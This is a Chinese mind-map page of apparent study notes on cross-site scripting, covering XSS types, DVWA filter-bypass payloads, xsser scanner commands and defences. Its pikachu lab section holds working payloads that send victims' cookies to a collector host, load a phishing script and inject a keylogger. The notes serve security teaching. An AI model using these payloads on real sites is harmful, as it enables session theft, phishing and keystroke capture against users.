导图社区 2.XSS注入
XSS:就是攻击者通过一些正常的站内交互途径(发布文章,添加文章、发送邮件,留言),提交含有恶意JavaScript脚本代码的文本内容。如果服务器端没有过滤这些恶意脚本,反面将其作为网站内容发布到Web页面上。当其他用户访问该页面时候,这些恶意脚本就会被执行,用户就会被攻击
后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
社区模板帮助中心,点此进入>>
互联网9大思维
组织架构-单商户商城webAPP 思维导图。
域控上线
python思维导图
css
CSS
计算机操作系统思维导图
计算机组成原理
IMX6UL(A7)
考试学情分析系统
XSS攻击
JavaScript操作Cookie
客户端读取cookie
alert(document.cookie);
客户端设置cookie
document.cookie="username=wuya";
修改
新建一个同名的cookie,覆盖原来的cookie(属性必需一致)
删除
把过期时间设置为比当前时间早的时间
setcookie("username",time()-1);
XSS跨站攻击
javascript:alert(document.cookie)
跨站脚本注入网页:XSS
案例
http://localhost/xss/reflect.html
POST请求
payload:<script>alert(1)</script>
http://localhost/xss/get.html
GET请求
payload:http://localhost/xss/get.html?url=javascript:alert(1)
定义
恶意攻击者利用web页面漏洞,插入一些恶意代码,当用户访问页面的时候,代码就会执行,这个时候就达到了攻击的目的
除了JavaScrip之外,这个脚本也可以用Java,VBScript、ActiveX、Flash等等
分类
反射型
包括DOM型
流程型
存储型
流程
利用点:文章、留言板、公告板、评论
演示
http://localhost/xss/store.html
对应数据库的xss表
攻击:http://localhost/xss/query.php?id=
XSS靶场
Low
<script>alert('xss')<script>
Midum
大小写或者又写绕过
<sCriPt>alert('xss')<Script>
<scri<script>pt>alert('xss')<script>
High
其他标签绕过
<img src="" onerror="alert(xss)">
Impossible
使用htmlspecialchars函数,把相应字符转换为实体字符
存储型xss
<ScRipt>alert(/xss/)<ScriPt>
<img src=x onerror=alert(/xss/)>
XSS防御
输入
WAF过滤:modsecurity
输出
转义
XSS检测和利用
测试payload
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<img src="javascript:alert('XSS')">
onerror="alert('XSS')">
XSSER
主要特性
同时使用GET和POST方法注入
包括各种过滤和绕过技术
可以与命令行和GUL一起使用
将提供攻击的详细统计数据
详细参数
xsser -h
检测接口
xsser -u "http://192.168.142.1/dvwa/ vulnerabilities/" -g "xss_r/?name=XSS" -- cookie="security=low; PHPSESSID= c8gmju4nn8l4hh30um56uejr3f" -s -v -- reverse-check
注意:替换成DVWA最新的cookie
基于搜索引擎语法检测
xsser -De"google" -d "search.php?q="
图形化界面
xsser --gtk
XSS平台
pikachu
基于反射型GET
获取Cookie
payload1
修改输入长度
<script>document.location='http://192.168. 142.66/pikachu/pkxss/xcookie/cookie.php? cookie='+document.cookie;</script>
payload2
http://localhost/pikachu/vul/xss/xss_ reflected_get.php?message=<script> document.location='http://192.168.142.66/ pikachu/pkxss/xcookie/cookie.php? cookie='+document.cookie;</script>& submit=submit
基于在弄型
钓鱼
payload
<script src="http://192.168.142.66/pikachu/ pkxss/xfish/fish.php"></script>
键盘记录
<script src="http://192.168.142.66/pikachu/ pkxss/rkeypress/rk.js"></script>